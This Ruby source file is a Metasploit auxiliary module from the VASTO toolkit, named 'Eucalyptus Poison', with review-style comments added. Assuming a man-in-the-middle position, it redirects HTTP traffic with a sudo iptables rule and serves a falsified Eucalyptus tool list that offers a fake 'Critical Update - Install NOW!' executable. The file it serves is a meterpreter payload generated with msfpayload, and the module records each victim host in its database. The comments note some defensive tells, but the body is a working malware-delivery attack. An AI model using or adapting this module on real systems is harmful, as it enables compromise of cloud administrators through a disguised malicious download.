#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
# Auxiliary module from the VASTO 0.4 toolkit, written against the legacy
# Metasploit3 API (`require 'msf/core'`, `register_options(..., self.class)`,
# the `msfpayload` CLI, since retired in favour of msfvenom).
#
# What the code does: listens on SRVPORT as a plain-HTTP server and, relying on
# traffic having been redirected to it (see `run`), answers two Eucalyptus list
# endpoints with canned content and serves a generated executable in place of
# the "critical update" that its own tool list advertises.
#
# Points a defender should take from this file:
# * Everything here is cleartext HTTP on tcp/80: the DNAT rule in `run` only
#   rewrites that port and the responses are hand-built HTTP/1.1. A client that
#   fetched these lists over TLS with certificate validation, or verified a
#   signature on what it downloaded, would not accept these responses as written.
# * The served tool list (dispatch_request) advertises a bare `.exe` under a
#   vendor hostname, and every response carries `Content-Type:
#   binary/octet-string`, which is not a registered media type; both are
#   observable anomalies on the wire.
# * The operator's own host is modified: `run` appends an iptables NAT rule via
#   sudo and nothing in this class removes it.
# * Datastore option values are interpolated unquoted into shell command strings
#   (`run`, `create_exploit`).
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::TcpServer
  include Msf::Auxiliary::Report
  include Rex::FileUtils

  # Module metadata and options. Only SRVPORT and PAYLOAD are registered here;
  # SRVHOST, LHOST, LPORT and RHOST are read from the datastore in `run` without
  # being declared, so they presumably come from the framework or the payload
  # (not visible in this file). SRVPORT defaults to 80 because the DNAT rule in
  # `run` keeps the original destination port.
  def initialize
    super(
      'Name' => 'Eucalyptus Poison',
      'Version' => '0.1',
      # The %q body below is kept at column 0: its leading whitespace is part
      # of the string literal.
      'Description' => %q{
This module will assume a MITM attack is in place
against the remote Eucalyptus cloud controller.
The module will poison the Extra section of the interface,
presenting fake tools with the selected payload. This module
requres root privileges to run.
},
      'Author' => ['Claudio Criscione'],
      'License' => GPL_LICENSE
    )
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "Local port to listen on.", 80 ]),
        OptString.new('PAYLOAD', [ true, "Payload to run vs the client.", "windows/meterpreter/bind_tcp" ]),
      ], self.class)
  end

  # Entry point. Appends a NAT rule on the local host (via sudo) that redirects
  # every outbound tcp/80 connection to loopback, copies datastore options into
  # instance variables and hands control to the TcpServer mixin's `exploit()`,
  # which is presumably what starts the listener (defined outside this file).
  #
  # NOTE(review): the iptables rule is appended and never deleted; there is no
  # cleanup hook in this class, so the redirect outlives the module.
  # NOTE(review): this method assigns @RHOST, but the rest of the class reads
  # @RPORT, which is never set here.
  def run
    system("sudo iptables -t nat -A OUTPUT -p tcp --destination-port 80 -j DNAT --to 127.0.0.1")
    @myhost = datastore['SRVHOST']
    @myport = datastore['SRVPORT']
    @payload = datastore['PAYLOAD']
    @LPORT = datastore['LPORT']
    @LHOST = datastore['LHOST']
    @RHOST = datastore['RHOST']
    # Resolved per request in dispatch_request.
    @vasto_directory = ""
    exploit()
  end

  # TcpServer callback: give the raw client socket Rex's HTTP server-side
  # request helpers and bind it to this module.
  #
  # @param c [Rex::Socket] accepted client connection
  def on_client_connect(c)
    c.extend(Rex::Proto::Http::ServerClient)
    c.init_cli(self)
  end

  # TcpServer callback: read one chunk from the client (5 second timeout), feed
  # it to the HTTP request parser and dispatch a completed request.
  #
  # Control flow worth knowing: `close_client` always raises ::EOFError. On a
  # parse error that raise is swallowed by the first rescue clause and
  # `close_client` runs a second time below, so `cli.close` is called twice on
  # that path. On every path the trailing `close_client(cli)` re-raises
  # ::EOFError out of this method, which the comment in `close_client` says the
  # service needs in order to clean up.
  #
  # NOTE(review): `rescue ::Exception` also catches SystemExit, Interrupt and
  # NoMemoryError; a bare `rescue` (StandardError) is the conventional choice.
  #
  # @param cli [Rex::Proto::Http::ServerClient] client extended in on_client_connect
  def on_client_data(cli)
    begin
      data = cli.get_once(-1, 5)
      # A nil or empty read is treated as a dropped connection.
      raise ::Errno::ECONNABORTED if !data or data.length == 0
      case cli.request.parse(data)
      when Rex::Proto::Http::Packet::ParseCode::Completed
        dispatch_request(cli, cli.request)
        cli.reset_cli
      when Rex::Proto::Http::Packet::ParseCode::Error
        close_client(cli)
      end
    rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET
      # Expected socket-level failures: nothing logged, fall through to the close below.
    rescue ::OpenSSL::SSL::SSLError
      # Also swallowed silently; no TLS is configured anywhere in this file.
    rescue ::Exception
      print_status("EucaPoison - Error: #{$!.class} #{$!} #{$!.backtrace}")
    end
    close_client(cli)
  end

  # Close the client socket and raise ::EOFError so the TcpServer mixin tears
  # the connection down (per the original author's comment below). Callers must
  # expect this method to raise, never to return.
  #
  # @param cli [Rex::Proto::Http::ServerClient]
  # @raise [EOFError] always
  def close_client(cli)
    cli.close
    # Require to clean up the service properly
    raise ::EOFError
  end

  # Handle one parsed HTTP request. Three resources are answered; anything else
  # gets no response at all and the caller simply closes the socket:
  #   /downloads/eucalyptus-images/list.php -> a fixed, unmodified image list
  #   /downloads/eucalyptus-tools/list.php  -> a tool list whose first entry points
  #                                            at /critical_update.exe
  #   /critical_update.exe                  -> the file produced by create_exploit,
  #                                            followed by a report_note for the DB
  #
  # Every response is hand-built HTTP/1.1 with `Connection: Close`; the `Host:`
  # header is set to the local address that faces the peer (unusual in a
  # response, but harmless). `Content-Length` uses `String#length`, i.e. a
  # character count rather than `bytesize`.
  #
  # NOTE(review): `phost` and `hhead` are computed but never read afterwards.
  #
  # @param cli [Rex::Proto::Http::ServerClient] client socket
  # @param req [Rex::Proto::Http::Request] parsed request (resource, headers)
  def dispatch_request(cli, req)
    #Find vasto directory
    # Looks in the framework module tree first, then the user module tree.
    # NOTE(review): if neither exists this only prints via Kernel#p (not
    # print_error) and keeps going; the later File.read then raises
    # Errno::ENOENT, which ends up in the `rescue ::Exception` logger in
    # on_client_data.
    @vasto_directory = "#{Msf::Config.module_directory}/auxiliary/vasto"
    @vasto_directory = "#{Msf::Config.user_module_directory}/auxiliary/vasto" if(not File.exist?(@vasto_directory))
    p "vasto modules not found!\nMust reside in: #{Msf::Config.module_directory}/auxiliary/vasto\n or: #{Msf::Config.user_module_directory}/auxiliary/vasto" if(not File.exist?(@vasto_directory))
    phost = cli.peerhost
    mysrc = Rex::Socket.source_address(cli.peerhost)
    hhead = (req['Host'] || @myhost).split(':', 2)[0]
    # Proxy-style request line ("GET http://host[:port]/path ..."): strip the
    # scheme and authority so `req.resource` holds just the path.
    # NOTE(review): `$1.split(":", 2)[0]` is a single String, so the parallel
    # assignment leaves `nport` nil and @myport always falls back to 80 here;
    # @myport is not read anywhere else in this class.
    if (req.resource =~ /^http\:\/+([^\/]+)(\/*.*)/)
      req.resource = $2
      hhead, nport = $1.split(":", 2)[0]
      @myport = nport || 80
    end
    #Providing a standard image list - we could poison this one too some day
    #TODO poison images
    # Image list: passed through unmodified (same entries the vendor site served
    # at the time, as far as this file shows).
    if(req.resource == "/downloads/eucalyptus-images/list.php")
      data =
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-centos-5.3-i386.tar.gz euca-centos-5.3-i386.tar.gz CentOS 5.3 i386\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-centos-5.3-x86_64.tar.gz euca-centos-5.3-x86_64.tar.gz CentOS 5.3 x86_64\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-debian-5.0-i386.tar.gz euca-debian-5.0-i386.tar.gz Debian 5.0 (lenny) i386\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-debian-5.0-x86_64.tar.gz euca-debian-5.0-x86_64.tar.gz Debian 5.0 (lenny) x86_64\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-fedora-10-x86_64.tar.gz euca-fedora-10-x86_64.tar.gz Fedora 10 x86_64\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-fedora-11-i386.tar.gz euca-fedora-11-i386.tar.gz Fedora 11 i386\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-ubuntu-9.04-i386.tar.gz euca-ubuntu-9.04-i386.tar.gz Ubuntu 9.04 (jaunty) i386\r\n" +
        "http://eucalyptussoftware.com/downloads/eucalyptus-images/euca-ubuntu-9.04-x86_64.tar.gz euca-ubuntu-9.04-x86_64.tar.gz Ubuntu 9.04 (jaunty) x86_64\r\n"
      res =
        "HTTP/1.1 200 Ok\r\n" +
        "Host: #{mysrc}\r\n" +
        "Content-Type: binary/octet-string\r\n" +
        "Content-Length: #{data.length}\r\n" +
        "Connection: Close\r\n\r\n#{data}"
      cli.put(res)
      return
    end
    #Here we generate the poisonous list
    # Tool list: the first entry is the injected one; the other two are the
    # vendor's own wiki pages. From the client's side the only tell is an
    # executable being offered where the genuine list offers documentation.
    if(req.resource == "/downloads/eucalyptus-tools/list.php")
      print_status("EucaPoison - Client #{cli.peerhost} is requesting tool list. Generating evil list.")
      data =
        "http://www.eucalyptussoftware.com/critical_update.exe critical_update Critical Update - Install NOW!\r\n" +
        "http://open.eucalyptus.com/wiki/Euca2oolsGuide euca2ools Eucalyptus Client Tools\r\n" +
        "http://open.eucalyptus.com/wiki/ToolsEcosystem other clients Eucalyptus Ecosystem Page\r\n"
      res =
        "HTTP/1.1 200 Ok\r\n" +
        "Host: #{mysrc}\r\n" +
        "Content-Type: binary/octet-string\r\n" +
        "Content-Length: #{data.length}\r\n" +
        "Connection: Close\r\n\r\n#{data}"
      cli.put(res)
      return
    end
    #Send the malicious payload
    # The executable is regenerated on every request for this path (see
    # create_exploit) and read back from disk in text mode.
    if(req.resource == "/critical_update.exe")
      print_status("EucaPoison - Bingo #{cli.peerhost} is asking for the critical update. Infecting.")
      create_exploit()
      print_status("#{cli.peerhost} uploading exploit")
      data = File.read("#{@vasto_directory}/data/eucapoison.exe")
      res =
        "HTTP/1.1 200 Ok\r\n" +
        "Host: #{mysrc}\r\n" +
        "Content-Type: binary/octet-string\r\n" +
        "Content-Length: #{data.length}\r\n" +
        "Connection: Close\r\n\r\n#{data}"
      cli.put(res)
      print_status("EucaPoison - Saving session information on DB")
      # Record the event in the framework database. :update => :unique_data
      # presumably dedupes on the :data hash (Report mixin, not visible here).
      # NOTE(review): @RPORT is never assigned in `run` (which sets @RHOST), so
      # :victim_port is nil unless something outside this file sets it.
      report_note(
        :type => 'host.Eucalyptus.poison',
        :data => {
          :attacker_host => @LHOST,
          :attacker_port => @LPORT,
          :victim_host => cli.peerhost,
          :victim_port => @RPORT,
          :payload => @payload
        },
        :update => :unique_data
      )
      return
    end
  end

  # Creating the exploit with a lame call to msfpayload
  #
  # Generate the file served as /critical_update.exe by shelling out to the
  # framework's `msfpayload` CLI with the selected PAYLOAD plus whichever of
  # LHOST/LPORT/RPORT are set, redirecting its "X" (executable) output into
  # <vasto dir>/data/eucapoison.exe. Called once per request for that path.
  #
  # NOTE(review): the command is one interpolated string run through `system`,
  # so every datastore value in it reaches the shell unquoted.
  # NOTE(review): the RPORT fragment is written `RPORT = ...` with spaces, unlike
  # the LHOST/LPORT fragments; since `run` never assigns @RPORT that branch is
  # normally skipped anyway.
  # NOTE(review): `@LHOST != nil` style checks would be `if @LHOST` in
  # idiomatic Ruby (only nil and false are falsy).
  def create_exploit()
    poison_path = "#{@vasto_directory}/data/eucapoison.exe"
    print_status("EucaPoison - Creating payload...")
    executeme = "#{Msf::Config.install_root}/msfpayload #{@payload} "
    if @LHOST != nil
      executeme = executeme + "LHOST=#{@LHOST} "
    end
    if @LPORT != nil
      executeme = executeme + "LPORT=#{@LPORT} "
    end
    if @RPORT != nil
      executeme = executeme + "RPORT = #{@RPORT} "
    end
    executeme = executeme + "X > #{poison_path}"
    # Logged verbatim, so the full command (including option values) lands in
    # the console output.
    print_status("Executing #{executeme}")
    system(executeme)
  end
end